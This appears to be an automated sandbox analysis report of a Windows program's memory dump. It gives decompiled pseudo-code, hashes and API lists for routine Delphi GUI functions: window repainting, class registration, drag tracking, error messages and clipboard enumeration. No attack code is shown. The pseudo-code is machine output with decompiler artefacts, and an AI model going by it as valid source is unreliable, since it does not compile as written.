Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: 7378ObjectSelect$A590ColorDeleteTable
String ID:
API String ID: 747582061-0
Opcode ID: d08077ca725950136e79a229e27704e05b7e80bfaa5b060cab79dba940338797
Instruction ID: 452fad253f54c0d634509e9c7bd6a6a400517d0344b36e04ce999980abad9942
Opcode Fuzzy Hash: d08077ca725950136e79a229e27704e05b7e80bfaa5b060cab79dba940338797
Instruction Fuzzy Hash: BE01966130432066D62477BA9C43F6B72F88FC1718F41D82FB585A72C3E67C9844839A

Uniqueness

Uniqueness Score: -1.00%

Function 0045E4BC, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045E4BC(void* __eax) {
				struct tagRECT _v20;
				struct HWND__* _t18;
				void* _t29;
				RECT* _t30;

				_t29 = __eax;
				ValidateRect(E0043F370(__eax), 0);
				InvalidateRect(E0043F370(_t29), 0, 0xffffffff);
				GetClientRect(E0043F370(_t29), _t30);
				_t18 = E0043F370( *((intOrPtr*)(_t29 + 0x240)));
				MapWindowPoints(E0043F370(_t29), _t18,  &_v20, 2);
				ValidateRect(E0043F370( *((intOrPtr*)(_t29 + 0x240))), _t30);
				return InvalidateRect(E0043F370( *((intOrPtr*)(_t29 + 0x240))),  &_v20, 0);
			}

0x0045e4c0
0x0045e4cc
0x0045e4dd
0x0045e4eb
0x0045e4fd
0x0045e50b
0x0045e51d
0x0045e53e

APIs

ValidateRect.USER32(00000000,00000000,0045ED10), ref: 0045E4CC
InvalidateRect.USER32(00000000,00000000,000000FF,00000000,00000000,0045ED10), ref: 0045E4DD
GetClientRect.USER32 ref: 0045E4EB
MapWindowPoints.USER32 ref: 0045E50B
ValidateRect.USER32(00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000,0045ED10), ref: 0045E51D
InvalidateRect.USER32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,000000FF,00000000,00000000), ref: 0045E535

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$InvalidateValidate$ClientPointsWindow
String ID:
API String ID: 2846033224-0
Opcode ID: 5924e76df3a7eec3d781882b906674ee73ac976f4d326a2b84aae9fcaaf2ac54
Instruction ID: 0d3d84cfd5b1673468f701fafe6b8462786ace25c5bfd209f9425858ab719b0f
Opcode Fuzzy Hash: 5924e76df3a7eec3d781882b906674ee73ac976f4d326a2b84aae9fcaaf2ac54
Instruction Fuzzy Hash: ACF0AFF0A5470026DA00BA7A8C87F8A328C5B08718F00597E7D19EB2D3DA3DF85C566D

Uniqueness

Uniqueness Score: -1.00%

Function 00420410, Relevance: 9.0, APIs: 6, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420410(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E0041F7EC( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E0041F7EC( *((intOrPtr*)(_t36 + 0x14))));
				if(E0041F8CC( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E0041EB0C(E0041F7B0( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E0041EB0C(E0041F7B0( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}

0x00420411
0x0042041c
0x0042042e
0x0042043d
0x00420477
0x00420488
0x0042043f
0x00420451
0x00420462
0x00420462

APIs

Part of subcall function 0041F7EC: CreateBrushIndirect.GDI32(?), ref: 0041F896

UnrealizeObject.GDI32(00000000), ref: 0042041C
SelectObject.GDI32(?,00000000), ref: 0042042E
SetBkColor.GDI32(?,00000000), ref: 00420451
SetBkMode.GDI32(?,00000002), ref: 0042045C
SetBkColor.GDI32(?,00000000), ref: 00420477
SetBkMode.GDI32(?,00000001), ref: 00420482

Part of subcall function 0041EB0C: GetSysColor.USER32(?), ref: 0041EB16

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 3791802644280878c8a9ba423e8e3e1777caffe9a8ee85fcb9d6721126e5de7c
Instruction ID: 47d42b9eba6ec1c28133e811eafa8900c5c1a9b5fd2748ea1de05bbddf51f6bf
Opcode Fuzzy Hash: 3791802644280878c8a9ba423e8e3e1777caffe9a8ee85fcb9d6721126e5de7c
Instruction Fuzzy Hash: 46F0CDB56041109BCA04FFBAD9C7E4B77AC9F043097004066B909DF187CA7DF8648739

Uniqueness

Uniqueness Score: -1.00%

Function 0043C480, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0043C480(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t47;
				void* _t48;
				intOrPtr _t75;
				intOrPtr _t93;
				intOrPtr _t97;
				void* _t98;
				intOrPtr* _t100;
				void* _t104;

				_t98 = __edi;
				_t83 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t100 = __eax;
				_push(_t104);
				_push(0x43c60b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t104 + 0xffffff40;
				_t84 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t100 + 0x174)) = _v108.lpfnWndProc;
					_t47 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t48 = _t47 + 1;
					if(_t48 == 0 || E00435AE8 != _v184.lpfnWndProc) {
						if(_t48 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E00435AE8;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040B2D0(_t83, _t84, _t98, _t100);
						}
					}
					 *0x4718d0 = _t100;
					_t85 =  *_t100;
					 *((intOrPtr*)( *_t100 + 0x9c))();
					if( *((intOrPtr*)(_t100 + 0x180)) == 0) {
						E0040B2D0(_t83, _t85, _t98, _t100);
					}
					E00408DBC( *((intOrPtr*)(_t100 + 0x64)));
					 *((intOrPtr*)(_t100 + 0x64)) = 0;
					E0043F680(_t100);
					E00439EA4(_t100, E0041EFE0( *((intOrPtr*)(_t100 + 0x68)), _t83, _t85), 0x30, 1);
					_t117 =  *((char*)(_t100 + 0x5c));
					if( *((char*)(_t100 + 0x5c)) != 0) {
						E004037B0(_t100, _t117);
					}
					_pop(_t93);
					 *[fs:eax] = _t93;
					_push(0x43c612);
					return E00404320( &_v196);
				} else {
					_t83 =  *((intOrPtr*)(__eax + 4));
					if(_t83 == 0 || ( *(_t83 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t100 + 8));
						_v188 = 0xb;
						_t75 =  *0x48e728; // 0x41d0d4
						E00406520(_t75,  &_v196);
						_t84 = _v196;
						E0040A124(_t83, _v196, 1, _t98, _t100, 0,  &_v192);
						E00403D80();
					} else {
						_t97 =  *0x434e14; // 0x434e60
						if(E00403740(_t83, _t97) == 0) {
							goto L6;
						}
						_v116 = E0043F370(_t83);
					}
					goto L7;
				}
			}

0x0043c480
0x0043c480
0x0043c489
0x0043c48d
0x0043c493
0x0043c497
0x0043c498
0x0043c49d
0x0043c4a0
0x0043c4ab
0x0043c4ad
0x0043c4b7
0x0043c52c
0x0043c52f
0x0043c544
0x0043c54c
0x0043c54e
0x0043c551
0x0043c562
0x0043c56c
0x0043c56c
0x0043c571
0x0043c57b
0x0043c58a
0x0043c58c
0x0043c58c
0x0043c58a
0x0043c591
0x0043c59f
0x0043c5a1
0x0043c5ae
0x0043c5b0
0x0043c5b0
0x0043c5b8
0x0043c5bf
0x0043c5c4
0x0043c5dc
0x0043c5e1
0x0043c5e5
0x0043c5ed
0x0043c5ed
0x0043c5f4
0x0043c5f7
0x0043c5fa
0x0043c60a
0x0043c4c2
0x0043c4c2
0x0043c4c7
0x0043c4ec
0x0043c4ef
0x0043c4f5
0x0043c50b
0x0043c510
0x0043c515
0x0043c522
0x0043c527
0x0043c4cf
0x0043c4d1
0x0043c4de
0x00000000
0x00000000
0x0043c4e7
0x0043c4e7
0x00000000
0x0043c4c7

APIs

GetClassInfoA.USER32 ref: 0043C544
UnregisterClassA.USER32 ref: 0043C56C
RegisterClassA.USER32 ref: 0043C582

Strings

@, xrefs: 0043C4B9
`NC, xrefs: 0043C4D1

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$InfoRegisterUnregister
String ID: @$`NC
API String ID: 3749476976-2021207740
Opcode ID: 89fce574dff8b7ea05d7ff18270542b8e03307a4a7e45fe49de226960ab66071
Instruction ID: 1e2d9df29549b5e657a4c7f3d1392662ba96d0e39aba2c5547ea8181207633d2
Opcode Fuzzy Hash: 89fce574dff8b7ea05d7ff18270542b8e03307a4a7e45fe49de226960ab66071
Instruction Fuzzy Hash: C9417271A003189BDB20DF65CC81B9EB7F9AF48304F0055BAE445E7392DB78AD45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00436824, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00436824(void* __eax, RECT* __ecx, intOrPtr __edx) {
				char _v5;
				struct tagPOINT _v13;
				intOrPtr _v20;
				intOrPtr* _v24;
				char _v28;
				struct tagRECT _v44;
				signed short _t43;
				intOrPtr* _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t64;
				intOrPtr _t65;
				int _t72;
				intOrPtr _t73;
				void* _t76;
				void* _t79;
				void* _t80;
				RECT* _t81;
				intOrPtr* _t84;
				void* _t92;
				void* _t95;

				_t81 = __ecx;
				asm("movsd");
				asm("movsd");
				_v20 = __edx;
				_v28 = 0;
				if( *0x48fba8 == 0) {
					L20:
					_t39 =  &_v28; // 0x436ae2
					return  *_t39;
				}
				_t43 = GetKeyState(0x11);
				_t84 =  *0x48e6ec; // 0x48fbfc
				if(((_t43 & 0xffffff00 | (_t43 & 0x00008000) != 0x00000000) ^  *( *_t84 + 0xb4)) == 0) {
					goto L20;
				}
				_t46 =  *0x48fbac; // 0x0
				 *((intOrPtr*)( *_t46 + 8))();
				_t48 =  *0x48fba8; // 0x0
				_t79 =  *((intOrPtr*)(_t48 + 8)) - 1;
				if(_t79 < 0) {
					L15:
					_t49 =  *0x48fbac; // 0x0
					if( *((intOrPtr*)(_t49 + 8)) > 0) {
						_t53 =  *0x48fbac; // 0x0
						_v28 = E00436038(_t53, _t81);
					}
					if(_v28 != 0 && E00436648(_v28, _t81, _t95) == 0) {
						_v28 = 0;
					}
					goto L20;
				} else {
					_t80 = _t79 + 1;
					_t92 = 0;
					do {
						_t55 =  *0x48fba8; // 0x0
						_v24 = E004140D0(_t55, _t92);
						if(_v24 != _v20 &&  *((char*)(_v24 + 0x1a6)) != 0 &&  *((intOrPtr*)( *_v24 + 0x50))() != 0 && IsWindowVisible(E0043F370(_v24)) != 0) {
							_t64 = E004367E0(_t95);
							_pop(_t81);
							if(_t64 != 0) {
								goto L14;
							}
							_t65 = _v20;
							_t106 =  *((intOrPtr*)(_t65 + 0xa0)) - _v24;
							if( *((intOrPtr*)(_t65 + 0xa0)) != _v24) {
								L11:
								_v5 = 1;
								_push( &_v13);
								_push( &_v5);
								_t81 =  &_v44;
								E004037B0(_v24, _t107);
								if(_v5 != 0) {
									_push(_v13.y);
									_t72 = PtInRect( &_v44, _v13);
									_t109 = _t72;
									if(_t72 != 0) {
										_t73 =  *0x48fbac; // 0x0
										E00435FA8(_t73, _v24, _t109);
									}
								}
								goto L14;
							}
							_t76 = E0043DF04(_v24, _t81, _t106);
							_t107 = _t76 - 1;
							if(_t76 - 1 <= 0) {
								goto L14;
							}
							goto L11;
						}
						L14:
						_t92 = _t92 + 1;
						_t80 = _t80 - 1;
					} while (_t80 != 0);
					goto L15;
				}
			}

0x00436824
0x00436832
0x00436833
0x00436834
0x00436839
0x00436843
0x00436973
0x00436973
0x0043697c
0x0043697c
0x0043684b
0x00436857
0x00436865
0x00000000
0x00000000
0x0043686b
0x00436872
0x00436875
0x0043687d
0x00436880
0x00436942
0x00436942
0x0043694b
0x0043694d
0x00436957
0x00436957
0x0043695e
0x00436970
0x00436970
0x00000000
0x00436886
0x00436886
0x00436887
0x00436889
0x0043688b
0x00436895
0x0043689e
0x004368d3
0x004368d8
0x004368db
0x00000000
0x00000000
0x004368dd
0x004368e6
0x004368e9
0x004368f6
0x004368f6
0x004368fd
0x00436901
0x00436902
0x0043690f
0x00436918
0x0043691a
0x00436924
0x00436929
0x0043692b
0x00436930
0x00436935
0x00436935
0x0043692b
0x00000000
0x00436918
0x004368ee
0x004368f3
0x004368f4
0x00000000
0x00000000
0x00000000
0x004368f4
0x0043693a
0x0043693a
0x0043693b
0x0043693b
0x00000000
0x00436889

APIs

GetKeyState.USER32(00000011), ref: 0043684B
IsWindowVisible.USER32(00000000), ref: 004368C9

Part of subcall function 004367E0: IsChild.USER32(00000000,00000000), ref: 00436810

PtInRect.USER32(?,?,?), ref: 00436924

Strings

jC, xrefs: 00436973
jC, xrefs: 00436961

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildRectStateVisibleWindow
String ID: jC$jC
API String ID: 2086824273-3820844482
Opcode ID: f517b2d35b0091c3793185a10c490c7056731f6d085933b575e6424195840147
Instruction ID: 7bb97f628d94c67668981898db818b834c320267823456bab039fb95cc1fa072
Opcode Fuzzy Hash: f517b2d35b0091c3793185a10c490c7056731f6d085933b575e6424195840147
Instruction Fuzzy Hash: 9D415171A0010AAFCB01DB59D481BDFB7B5EF08308F259166E504E73A1D774AD85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00436E9C, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00436E9C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
				intOrPtr _v16;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HWND__* _t37;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr* _t52;
				long _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t64;
				intOrPtr _t65;
				intOrPtr _t69;
				intOrPtr* _t76;
				void* _t78;
				intOrPtr* _t79;
				long long _t86;

				_t86 = __fp0;
				_t79 = _t78 + 0xfffffff8;
				_t69 = __ecx;
				_t44 = __edx;
				_t76 = __eax;
				 *0x48fb84 = __eax;
				_t24 =  *0x48fb84; // 0x0
				 *((intOrPtr*)(_t24 + 4)) = 0;
				GetCursorPos(0x48fb90);
				_t26 =  *0x48fb84; // 0x0
				_t57 = 0x48fb90->x; // 0x0
				 *(_t26 + 0xc) = _t57;
				_t58 =  *0x48fb94; // 0x0
				 *((intOrPtr*)(_t26 + 0x10)) = _t58;
				 *0x48fb98 = GetCursor();
				_t28 =  *0x48fb84; // 0x0
				"SPh`bC"();
				 *0x48fb8c = _t28;
				 *0x48fb9c = _t69;
				_t59 =  *0x433bf0; // 0x433c3c
				if(E00403740(_t76, _t59) == 0) {
					__eflags = _t44;
					if(__eflags == 0) {
						 *0x48fba0 = 0;
					} else {
						 *0x48fba0 = 1;
					}
				} else {
					_t64 = _t76;
					_t4 = _t64 + 0x44; // 0x44
					_t40 = _t4;
					_t48 =  *_t40;
					if( *((intOrPtr*)(_t40 + 8)) - _t48 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t64 + 0x20)) = 0;
						 *((intOrPtr*)(_t64 + 0x24)) = 0;
					} else {
						 *_t79 =  *((intOrPtr*)(_t64 + 0xc)) - _t48;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t40 + 8)) -  *_t40;
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t64 + 0x20)) = __fp0;
						asm("wait");
					}
					_t65 =  *((intOrPtr*)(_t40 + 4));
					if( *((intOrPtr*)(_t40 + 0xc)) - _t65 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t76 + 0x28)) = 0;
						 *((intOrPtr*)(_t76 + 0x2c)) = 0;
					} else {
						_t52 = _t76;
						 *_t79 =  *((intOrPtr*)(_t52 + 0x10)) - _t65;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t40 + 0xc)) -  *((intOrPtr*)(_t40 + 4));
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t52 + 0x28)) = _t86;
						asm("wait");
					}
					if(_t44 == 0) {
						 *0x48fba0 = 0;
					} else {
						 *0x48fba0 = 2;
						 *((intOrPtr*)( *_t76 + 0x30))();
					}
				}
				_t31 =  *0x48fb84; // 0x0
				 *0x48fba4 =  *((intOrPtr*)( *_t31 + 8))();
				_t84 =  *0x48fba4;
				if( *0x48fba4 != 0) {
					_t36 =  *0x48fb94; // 0x0
					_t37 = GetDesktopWindow();
					_t38 =  *0x48fba4; // 0x0
					E00440D20(_t38, _t37, _t84, _t36);
				}
				_t34 = E00403584(1);
				 *0x48fbac = _t34;
				if( *0x48fba0 != 0) {
					_t34 = E00436BCC(0x48fb90, 1);
				}
				return _t34;
			}

0x00436e9c
0x00436e9f
0x00436ea2
0x00436ea4
0x00436ea6
0x00436ea8
0x00436eae
0x00436eb5
0x00436ebd
0x00436ec2
0x00436ec7
0x00436ecd
0x00436ed0
0x00436ed6
0x00436ede
0x00436ee3
0x00436ee8
0x00436eed
0x00436ef2
0x00436efa
0x00436f07
0x00436f99
0x00436f9b
0x00436fa6
0x00436f9d
0x00436f9d
0x00436f9d
0x00436f0d
0x00436f0d
0x00436f0f
0x00436f0f
0x00436f15
0x00436f1b
0x00436f3d
0x00436f3f
0x00436f42
0x00436f1d
0x00436f22
0x00436f25
0x00436f2d
0x00436f31
0x00436f35
0x00436f37
0x00436f3a
0x00436f3a
0x00436f48
0x00436f4f
0x00436f74
0x00436f76
0x00436f79
0x00436f51
0x00436f51
0x00436f58
0x00436f5b
0x00436f64
0x00436f68
0x00436f6c
0x00436f6e
0x00436f71
0x00436f71
0x00436f7e
0x00436f90
0x00436f80
0x00436f80
0x00436f8b
0x00436f8b
0x00436f7e
0x00436fad
0x00436fb7
0x00436fbc
0x00436fc3
0x00436fc5
0x00436fcb
0x00436fd8
0x00436fdd
0x00436fdd
0x00436fe9
0x00436fee
0x00436ffa
0x00437001
0x00437001
0x0043700b

APIs

GetCursorPos.USER32(0048FB90), ref: 00436EBD
GetCursor.USER32(0048FB90), ref: 00436ED9

Part of subcall function 004360DC: SetCapture.USER32(00000000,00000001,00436EED,0048FB90), ref: 004360EB

GetDesktopWindow.USER32 ref: 00436FCB

Strings

0_C, xrefs: 00436FE4
<<C, xrefs: 00436EFA

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$CaptureDesktopWindow
String ID: 0_C$<<C
API String ID: 669539147-1233367007
Opcode ID: 0647aab09b97290ffcb3a07a04ef953ac86450df05c6cc5be72a4360306d67ad
Instruction ID: 868fc49dae36dac0df15edeb276aa526b95886d61c05595a35af53607f0a97a2
Opcode Fuzzy Hash: 0647aab09b97290ffcb3a07a04ef953ac86450df05c6cc5be72a4360306d67ad
Instruction Fuzzy Hash: 34419EB4204201DFC304DF29E96461ABBE1BB8C364F16C97EE0498B362DB35E849CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4FC, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040A4FC(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40a6b7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x48e6f0; // 0x407520
					E00406520(_t52,  &_v8);
				} else {
					_t86 =  *0x48e860; // 0x407518
					E00406520(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x48e7b8; // 0x4074c0
					E00406520(_t60,  &_v372);
					E0040A124(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E00404588( &_v340, 0x105,  &_v297);
					E00408A48(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x48e764; // 0x407570
					E00406520(_t82,  &_v344);
					E0040A124(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040A6BE);
				E00404320( &_v372);
				E00404344( &_v344, 3);
				return E00404320( &_v8);
			}

0x0040a4fc
0x0040a509
0x0040a50f
0x0040a515
0x0040a51b
0x0040a521
0x0040a526
0x0040a527
0x0040a52c
0x0040a52f
0x0040a535
0x0040a53c
0x0040a550
0x0040a555
0x0040a53e
0x0040a541
0x0040a546
0x0040a546
0x0040a55a
0x0040a567
0x0040a573
0x0040a62f
0x0040a635
0x0040a63f
0x0040a645
0x0040a64c
0x0040a652
0x0040a668
0x0040a66d
0x0040a67f
0x0040a596
0x0040a599
0x0040a59f
0x0040a5b7
0x0040a5c8
0x0040a5d3
0x0040a5d9
0x0040a5e3
0x0040a5e9
0x0040a5f0
0x0040a5f6
0x0040a60c
0x0040a611
0x0040a623
0x0040a628
0x0040a688
0x0040a68b
0x0040a68e
0x0040a699
0x0040a6a9
0x0040a6b6

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A6B7), ref: 0040A567
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A6B7), ref: 0040A589

Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551

Strings

u@, xrefs: 0040A550
pu@, xrefs: 0040A60C
~@, xrefs: 0040A61E, 0040A67A

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: FileLoadModuleNameQueryStringVirtual
String ID: u@$ ~@$pu@
API String ID: 902310565-2810613298
Opcode ID: 49bdfd7ffdcc6dc76c1208d79f8952532d69cb373c48499442734dfe3413d71e
Instruction ID: 3d4fd221561994e078157927074f4b75dba3c298c2c4c624566ae571ef672628
Opcode Fuzzy Hash: 49bdfd7ffdcc6dc76c1208d79f8952532d69cb373c48499442734dfe3413d71e
Instruction Fuzzy Hash: 2B413630900658DFDB20DF65DC81BDEB7F4AB49304F4044EAE908AB291D778AE94CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0043260C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0043260C(intOrPtr* __eax, void* __edx) {
				intOrPtr* _v8;
				void* __ecx;
				void* __ebp;
				void* _t16;
				void* _t20;
				void* _t24;
				void* _t25;
				signed short _t26;
				void* _t28;
				intOrPtr _t29;
				intOrPtr _t38;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t48;
				intOrPtr _t51;

				_t43 = __edx;
				_v8 = __eax;
				 *((intOrPtr*)( *_v8 + 0x18))(_t42, _t45, _t25, _t28, _t48);
				_push(_t51);
				_push(0x4326ae);
				_push( *[fs:edx]);
				 *[fs:edx] = _t51;
				_t26 = EnumClipboardFormats(0);
				_t52 = _t26;
				if(_t26 == 0) {
					L4:
					_t29 =  *0x48e524; // 0x41d2fc
					E0040A1A4(_t29, 1);
					E00403D80();
					__eflags = 0;
					_pop(_t38);
					 *[fs:eax] = _t38;
					return  *((intOrPtr*)( *_v8 + 0x14))(0x4326b5);
				} else {
					while(1) {
						_t16 = E004222F4(_t26, _t52);
						_t53 = _t16;
						if(_t16 != 0) {
							break;
						}
						_t26 = EnumClipboardFormats(_t26 & 0x0000ffff);
						__eflags = _t26;
						if(__eflags != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					_t20 = GetClipboardData(_t26 & 0x0000ffff);
					E00422204(_t43, _t20, _t26, _t53, GetClipboardData(9));
					_t24 = E00403E2C();
					return _t24;
				}
				L6:
			}

0x00432613
0x00432615
0x0043261d
0x00432622
0x00432623
0x00432628
0x0043262b
0x00432635
0x00432637
0x0043263a
